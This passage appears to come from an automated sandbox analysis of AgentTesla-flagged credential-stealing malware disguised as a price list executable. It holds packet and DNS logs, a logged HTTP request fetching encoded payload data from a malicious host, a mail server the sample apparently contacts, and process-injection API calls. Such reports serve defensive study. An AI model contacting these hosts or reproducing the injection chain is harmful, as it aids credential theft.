                                                Feb 23, 2021 09:58:22.758708954 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.013287067 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.013379097 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.013473034 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.013473988 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.028273106 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.028363943 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.028364897 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.028405905 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.028443098 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.028709888 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.028738022 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.028789997 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.029540062 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.071616888 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.411633968 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.411674976 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.411773920 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.411891937 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.411923885 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.411974907 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.412672997 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.412698030 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.412766933 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.416315079 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.416357040 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.416379929 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.416403055 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.416426897 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.416456938 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.416501999 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.420417070 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.420450926 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.420514107 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.420936108 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.420970917 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.421030045 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.421581984 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.421607971 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.421653032 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.422748089 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.422777891 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.422832966 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.423101902 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.423125982 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.423161030 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.423939943 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.424009085 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.424053907 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.424686909 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.424736977 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.424772978 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.477603912 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.718730927 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.718763113 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.718866110 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.719019890 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.719047070 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.719094992 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.719808102 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.719825983 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.719882965 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.722831964 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.722852945 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.722944021 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.723198891 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.723217964 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.723278046 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.723992109 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.724011898 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.724083900 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.724754095 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.724775076 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.724833012 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.725529909 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.729638100 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.729671001 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.729746103 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.729990005 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.730015993 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.730065107 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.730792999 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.730818033 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.730849028 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.731538057 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.731563091 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.731600046 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.732333899 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.732358932 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.732398987 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.733134031 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.733160019 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.733206034 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.733901024 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.733923912 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.733958006 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.734671116 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.734694004 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.734751940 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.735446930 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.735474110 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.735507011 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.736222982 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.736248016 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.736279964 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.737037897 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.737056971 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:23.737099886 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:23.790169954 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.210294962 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.210340977 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.210555077 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.210616112 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.210643053 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.210820913 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.211052895 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.211082935 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.211180925 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.211971045 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.211998940 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.212210894 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.212632895 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.212666035 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.212783098 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.213506937 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.213537931 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.213701963 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.214184046 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.214215994 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.214350939 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.214951992 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.214976072 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.215087891 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.215712070 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.215738058 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.215832949 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.216526031 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.216555119 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.216662884 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.217473030 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.258990049 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.507621050 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.507683039 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.507875919 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.507968903 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.508034945 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.508086920 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.508761883 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.508826017 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.509342909 CET4971180192.168.2.6104.21.71.230
                                                Feb 23, 2021 09:58:24.509527922 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.509591103 CET8049711104.21.71.230192.168.2.6
                                                Feb 23, 2021 09:58:24.509669065 CET4971180192.168.2.6104.21.71.230

                                                UDP Packets


                                                DNS Queries

                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                Feb 23, 2021 09:58:11.400343895 CET | 192.168.2.6 | 8.8.8.8 | 0xcc4b | Standard query (0) | coroloboxorozor.com | A (IP address) | IN (0x0001)
                                                Feb 23, 2021 10:00:17.463215113 CET | 192.168.2.6 | 8.8.8.8 | 0x8f5d | Standard query (0) | mail.electrobelarmino.pt | A (IP address) | IN (0x0001)

                                                DNS Answers

                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                Feb 23, 2021 09:58:11.460376024 CET | 8.8.8.8 | 192.168.2.6 | 0xcc4b | No error (0) | coroloboxorozor.com | | 104.21.71.230 | A (IP address) | IN (0x0001)
                                                Feb 23, 2021 09:58:11.460376024 CET | 8.8.8.8 | 192.168.2.6 | 0xcc4b | No error (0) | coroloboxorozor.com | | 172.67.172.17 | A (IP address) | IN (0x0001)
                                                Feb 23, 2021 10:00:17.531023026 CET | 8.8.8.8 | 192.168.2.6 | 0x8f5d | No error (0) | mail.electrobelarmino.pt | | 109.71.43.243 | A (IP address) | IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • coroloboxorozor.com

                                                HTTP Packets

                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                0 | 192.168.2.6 | 49711 | 104.21.71.230 | 80 | C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe

                                                Timestamp | kBytes transferred | Direction | Data
                                                Feb 23, 2021 09:58:11.550564051 CET | 1090 | OUT | GET /base/FBD1AA88F2DB3E5E79F7212492E97FE4.html HTTP/1.1
                                                Host: coroloboxorozor.com
                                                Connection: Keep-Alive
                                                Feb 23, 2021 09:58:11.669672012 CET | 1092 | IN | HTTP/1.1 200 OK
                                                Date: Tue, 23 Feb 2021 08:58:11 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Set-Cookie: __cfduid=d9f146432d691f502a99c6af0b59c5ad41614070691; expires=Thu, 25-Mar-21 08:58:11 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                Last-Modified: Mon, 22 Feb 2021 22:31:52 GMT
                                                Vary: Accept-Encoding
                                                X-Frame-Options: SAMEORIGIN
                                                CF-Cache-Status: DYNAMIC
                                                cf-request-id: 086fb54f0400004c91ce8ce000000001
                                                Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=bT5dh5XRbuDUZZ0Vs%2F6zo3dmicm5%2B%2BuvU76ejQkzUdOReaWiTUY8L%2F36nBo9SflV30a2je6zBp56jL8MAZLxqF7hoiknK4gJ1LQ3a6TjPhSRsU4y"}],"max_age":604800}
                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 625fbe5e680f4c91-AMS
                                                Feb 23, 2021 09:58:11.669926882 CET1103INData Raw: 6b 6b 52 6d 57 52 46 52 46 52 6b 46 52 6d 67 6e 52 6b 6e 52 6e 52 46 52 67 56 52 67 56 52 46 52 46 52 46 52 6d 67 6e 52 6b 57 52 6e 52 46 52 6e 46 52 6d 6e 52 46 52 46 52 6b 46 52 6d 67 6e 52 6b 6e 52 67 52 46 52 6d 67 6e 52 6b 6d 52 67 52 46 52
                                                Data Ascii: kkRmWRFRFRkFRmgnRknRnRFRgVRgVRFRFRFRmgnRkWRnRFRnFRmnRFRFRkFRmgnRknRgRFRmgnRkmRgRFRnFRmgRFRFRkFRmgnRkmRmRFRnFRmVRFRFRkFRmkrRmgnRknRVRFRmgnRkmRWRFRmgnRkmRVRFRnFRmHRFRFRkFRkkkRmrRFRFRkFRWrRFRmgnRkWRnRFRnFRmJRFRFRkFRmgnRknRHRFRmgnRkmRHRFRgrRkHrRmg
                                                Feb 23, 2021 09:58:11.669956923 CET1104INData Raw: 52 6b 48 72 52 6d 67 67 52 6d 67 67 52 6d 67 67 52 6d 6d 6b 52 6b 48 52 46 52 46 52 46 52 6d 67 6e 52 6b 57 52 6e 52 46 52 6d 67 6e 52 6d 6d 52 6d 52 46 52 46 52 6d 48 52 6b 6b 6b 52 57 46 52 46 52 46 52 6b 46 52 46 52 6d 6d 46 52 6d 67 6e 52 6b
                                                Data Ascii: RkHrRmggRmggRmggRmmkRkHRFRFRFRmgnRkWRnRFRmgnRmmRmRFRFRmHRkkkRWFRFRFRkFRFRmmFRmgnRkmRWRFRkkkRWkRFRFRkFRmgnRknRFRFRgVRFRFRFRFRmgnRkmRFRFRnmRFRFRkRkVRFRFRmRFRmrRFRkFVRkWnRFRkHRFRFRFRFRmHRnrRmRFRkHnRFRFRFRkRFRFRkHRFRkknRmFgRmRFRkkmRmgnRknRkRFRkknR
                                                Feb 23, 2021 09:58:11.670891047 CET1106INData Raw: 52 6b 6b 6e 52 56 4a 52 57 52 46 52 6b 6b 6d 52 6d 67 6e 52 6b 6e 52 6d 52 46 52 6b 6b 67 52 6d 6b 52 46 52 46 52 6b 46 52 6d 67 6e 52 6b 6e 52 57 52 46 52 6d 67 6e 52 6b 6d 52 6b 52 46 52 6e 46 52 6b 52 46 52 46 52 6e 57 52 6b 6b 6b 52 6d 57 52
                                                Data Ascii: RkknRVJRWRFRkkmRmgnRknRmRFRkkgRmkRFRFRkFRmgnRknRWRFRmgnRkmRkRFRnFRkRFRFRnWRkkkRmWRFRFRkFRmgnRknRnRFRgVRgVRFRFRFRmgnRkWRnRFRnFRmnRFRFRkFRmgnRknRgRFRmgnRkmRgRFRnFRmgRFRFRkFRmgnRkmRmRFRnFRmVRFRFRkFRmkrRmgnRknRVRFRmgnRkmRWRFRmgnRkmRVRFRnFRmHRFRFRk


                                                Code Manipulations

                                                Statistics

                                                CPU Usage

                                                Memory Usage

                                                High Level Behavior Distribution

                                                Behavior

                                                System Behavior

                                                General

                                                Start time:09:58:10
                                                Start date:23/02/2021
                                                Path:C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe'
                                                Imagebase:0x4e0000
                                                File size:32624 bytes
                                                MD5 hash:404EF05A6ACC67C2B59189171F9EB0FC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.408840217.0000000007761000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.407424044.0000000006835000.00000004.00000001.sdmp, Author: Joe Security
                                                Reputation:low

                                                General

                                                Start time:09:58:28
                                                Start date:23/02/2021
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                Imagebase:0x2a0000
                                                File size:232960 bytes
                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:09:58:29
                                                Start date:23/02/2021
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff61de10000
                                                File size:625664 bytes
                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:09:58:29
                                                Start date:23/02/2021
                                                Path:C:\Windows\SysWOW64\timeout.exe
                                                Wow64 process (32bit):true
                                                Commandline:timeout 1
                                                Imagebase:0x280000
                                                File size:26112 bytes
                                                MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high

                                                General

                                                Start time:09:58:31
                                                Start date:23/02/2021
                                                Path:C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe
                                                Imagebase:0x840000
                                                File size:32624 bytes
                                                MD5 hash:404EF05A6ACC67C2B59189171F9EB0FC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.601396712.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmp, Author: Joe Security
                                                Reputation:low

                                                General

                                                Start time:09:58:33
                                                Start date:23/02/2021
                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 1592
                                                Imagebase:0xcc0000
                                                File size:434592 bytes
                                                MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:.Net C# or VB.NET
                                                Reputation:high

                                                Disassembly

                                                Code Analysis

                                                  Executed Functions

                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,027DAD3F,00000000,00000000), ref: 027DAE90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.381064478.00000000027D0000.00000040.00000001.sdmp, Offset: 027D0000, based on PE: false
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: b8da93c5f3c2b006e97df7f56a581a5109cc1f7a35b3d1969b45d484d3fb7851
                                                  • Instruction ID: 4b4fc176ebcf5e1a5b118f3ebd3bd3dcb5f6d87613dc78179119cd937e811a99
                                                  • Opcode Fuzzy Hash: b8da93c5f3c2b006e97df7f56a581a5109cc1f7a35b3d1969b45d484d3fb7851
                                                  • Instruction Fuzzy Hash: 4F1123B19002489FCB20CF9AC884BDFBBF4FF88324F148459E558A7250C775A944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,00000011,?,?,?,?,?,?,?,027DAD3F,00000000,00000000), ref: 027DAE90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.381064478.00000000027D0000.00000040.00000001.sdmp, Offset: 027D0000, based on PE: false
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: 545bc279b4c71bdd7eb0de61e1f712e18405084e24899522de413dae195c563d
                                                  • Instruction ID: 545c0000f5a21be48983fda48e0efb6cee263ab88a1df4e87732516549bc420d
                                                  • Opcode Fuzzy Hash: 545bc279b4c71bdd7eb0de61e1f712e18405084e24899522de413dae195c563d
                                                  • Instruction Fuzzy Hash: E31123719042489FCB10DF9AC448BDFBBF4FB88364F108429E559A7310C775A944CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 068D3876
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 77040104297e41a9174e637c639729f868047302f3489901689772e341120c2c
                                                  • Instruction ID: 470830bbc704f3f26d040b43c42ca425ccebff26b14af794ce19cc0c6cf2d983
                                                  • Opcode Fuzzy Hash: 77040104297e41a9174e637c639729f868047302f3489901689772e341120c2c
                                                  • Instruction Fuzzy Hash: 54A17971D00659DFDB50CF68C841BEEBBB2BF49314F048569E909E7240DB749A85CFA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 068D3876
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 97542d048a80ab479c0569a90da320d19a811f02674bcacbcad03313bc1f959f
                                                  • Instruction ID: 81e1b3d0b4d2d0f197da0e207ccc82995a0470db2d44f00b9c8aa4186e704f87
                                                  • Opcode Fuzzy Hash: 97542d048a80ab479c0569a90da320d19a811f02674bcacbcad03313bc1f959f
                                                  • Instruction Fuzzy Hash: 1A917871D00659DFDB50CF68C841BEEBBB2BF49314F048569E909E7240DB749A85CFA2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 068D4B89
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 46310fb6c5884a561f402e0f8bfbe07c54e6e61e4b587d4587e3d918d20d997d
                                                  • Instruction ID: 98b3ae1224d209ba54c7495ffa6f59098c9d4f791a7aabb8be20bcc8cd246eaf
                                                  • Opcode Fuzzy Hash: 46310fb6c5884a561f402e0f8bfbe07c54e6e61e4b587d4587e3d918d20d997d
                                                  • Instruction Fuzzy Hash: 8DA12670E002099BDB58DFA9D499BEDFBF2BF89324F188118D011EB391D7749849CB64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 068D2E48
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: d4125afdf9ed82b9201c98813f7d09a94bc70aa19374bc9a0f08e13e2bca8212
                                                  • Instruction ID: 397df9d515f2e54ce10ea878be58711e06be244b03412a8a5e44a698beca17a6
                                                  • Opcode Fuzzy Hash: d4125afdf9ed82b9201c98813f7d09a94bc70aa19374bc9a0f08e13e2bca8212
                                                  • Instruction Fuzzy Hash: 3E2126719003499FCB50CFA9C884BEEBBF5FF48314F14842AEA58A7241C7749955CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 068D2E48
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: 6d32871f38dc9d955f0b83c10e6290678e174fcfa71e77c2545375fcf64a6e5a
                                                  • Instruction ID: 59f663b62bc5e0f6d5e718744e6ee185037f74f51bcfb044f3a7023cf49c85b6
                                                  • Opcode Fuzzy Hash: 6d32871f38dc9d955f0b83c10e6290678e174fcfa71e77c2545375fcf64a6e5a
                                                  • Instruction Fuzzy Hash: D72115719003499FCB50CFA9C884BEEBBF5FF48314F048429EA19A7240D7789955CBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetThreadContext.KERNEL32(?,00000000), ref: 068D1E96
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.407796071.00000000068D0000.00000040.00000001.sdmp, Offset: 068D0000, based on PE: false
                                                  Similarity
                                                  • API ID: ContextThread
                                                  • String ID:
                                                  • API String ID: 1591575202-0
                                                  • Opcode ID: 71e52154e67ee84d79a55e3e9eaeeedfad9acdb85d512dd53c256b097d4ad31c
                                                  • Instruction ID: 19535696208ded80ab0c8d9eb23c6c3d6e81257511fa4dd431f83de8d052435a
                                                  • Opcode Fuzzy Hash: 71e52154e67ee84d79a55e3e9eaeeedfad9acdb85d512dd53c256b097d4ad31c
                                                  • Instruction Fuzzy Hash: 82214571D002489FDB50DFAAC4847EEBBF4AF48254F148429E599B7640CB78A985CFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
